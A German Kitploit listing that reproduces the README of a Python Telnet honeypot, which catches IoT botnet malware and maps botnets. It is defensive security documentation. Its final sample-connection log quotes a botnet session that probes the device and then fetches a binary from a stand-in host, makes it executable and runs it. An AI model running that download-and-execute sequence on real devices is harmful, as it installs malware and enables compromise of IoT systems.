Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
telnet-iot-honeypot — Python Telnet-Honeypot zum Abfangen von Botnet-Binärdateien | Kitploit
Tools/GitHubGitHub/phype/telnet-iot-honeypot
IoT-SicherheitNetzwerksicherheitMalware-AnalyseBedrohungsanalyse
GitHubphype/telnet-iot-honeypot

telnet-iot-honeypot

Python Telnet-Honeypot zum Abfangen von Botnet-Binärdateien

Repository anzeigen
31484vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Haftungsausschluss

Dieses Projekt wird weder unterstützt noch weiterentwickelt. Es basiert auf Python2, das 2020 sein EOL erreicht hat, und verwendet Abhängigkeiten, die mit der Zeit immer schwieriger zu installieren sind. Nutzung auf eigene Gefahr!

Telnet-IoT-Honeypot

'Python-Telnet-Honeypot zum Abfangen von Botnet-Binärdateien'

Dieses Projekt implementiert einen Python-Telnet-Server, der versucht, als Honeypot für IoT-Malware zu fungieren, die sich über schrecklich unsichere Standardpasswörter auf Telnet-Servern im Internet verbreitet.

Der Honeypot funktioniert durch Emulation einer Shell-Umgebung, ähnlich wie Cowrie (https://github.com/micheloosterhof/cowrie). Das Hauptziel dieses Projekts ist es, Botnet-Verbindungen automatisch zu analysieren und Botnets zu "kartieren", indem verschiedene Verbindungen und sogar Netzwerke miteinander verknüpft werden.

Architektur

Die Anwendung hat eine Client/Server-Architektur, bei der ein Client (der eigentliche Honeypot) Telnet-Verbindungen annimmt und ein Server Informationen über Verbindungen empfängt und die Analyse durchführt.

Der Backend-Server stellt eine HTTP-Schnittstelle bereit, die sowohl für den Zugriff auf das Frontend als auch von den Clients genutzt wird, um neue Verbindungsinformationen an das Backend zu senden.

Automatische Analyse

Das Backend verwendet zwei verschiedene Mechanismen, um Verbindungen automatisch zu verknüpfen:

Netzwerke

Netzwerke sind entdeckte Botnets. Ein Netzwerk ist die Menge aller verknüpften Verbindungen, URLs und Samples. URLs und Samples werden verknüpft, wenn sie in einer Verbindung verwendet werden. Zwei Verbindungen werden verknüpft, wenn beide Verbindungen vom selben Honeypot-Client empfangen werden (mehrere Clients werden unterstützt!) und innerhalb kurzer Zeit (Standard 2 Minuten) dieselben Anmeldedaten verwenden oder von derselben IP-Adresse stammen.

Malware

Mehrere Netzwerke werden als Nutzer desselben Malware-Typs identifiziert, wenn der während der Sitzungen der Netzwerke eingegebene Text größtenteils identisch ist. Dieser Vergleich erfolgt mithilfe einer Art "Hash"-Funktion, die eine Sitzung (oder Verbindung) im Wesentlichen in eine Folge von Wörtern übersetzt und dann jedes Wort auf ein einzelnes Byte abbildet, sodass die resultierende Bytefolge leicht durchsucht werden kann.

Ausführung

Die Anwendung hat eine Konfigurationsdatei namens config.py. Beispiele sind für lokale und Client/Server-Bereitstellungen enthalten.

Konfiguration

Das Backend benötigt eine SQL-Datenbank (Standard sqlite), die beim ersten Start initialisiert wird. Vor dem ersten Start sollten Sie ein Administratorkonto erstellen, das zum Generieren weiterer Benutzer verwendet wird. Das Administratorkonto kann auch direkt von einem Client zum Senden von Verbindungen verwendet werden. Wenn mehr als ein Honeypot verbunden werden soll, wird die Erstellung mehrerer Benutzer empfohlen.

root@kitploit:~
bash create_config.sh

Sowohl Client als auch Backend lesen die Dateien config.yaml und config.dist.yaml, um Konfigurationsparameter zu lesen. Die Datei config.dist.yaml enthält Standardwerte für alle außer den Administrator-Benutzeranmeldedaten, und diese Parameter werden durch Einträge in der Datei config.yaml überschrieben.

Server ausführen

root@kitploit:~
python backend.py

Client ausführen

Dieses Projekt enthält einen eigenen Honeypot, aber aufgrund der Client/Server-Architektur können auch andere Honeypots verwendet werden.

Verwendung des integrierten Honeypots

root@kitploit:~
python honeypot.py

Der Client kann nicht gestartet werden, wenn der Server nicht läuft. Um eine andere Konfiguration für den Client zu verwenden, können Sie den Schalter -c wie folgt verwenden:

root@kitploit:~
python honeypot.py -c myconfig.yaml

Wenn Sie nur die Honeypot-Funktionalität überprüfen möchten, können Sie den Client im interaktiven Modus starten:

root@kitploit:~
python honeypot shell

Verwendung von Cowrie

Ich habe ein Ausgabe-Plugin für Cowrie geschrieben, das viel mehr Funktionen als der integrierte Honeypot hat. Wenn Sie stattdessen Cowrie verwenden möchten, sehen Sie sich meinen Fork an, der das Ausgabemodul enthält: https://github.com/Phype/cowrie .

Öffnen des Frontends

Nachdem der Server gestartet ist, öffnen Sie http://127.0.0.1/ in Ihrem bevorzugten Browser.

Beispielverbindung

root@kitploit:~
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

Bilder

Screenshot 1

Screenshot 2

Screenshot 3

Tool herunterladen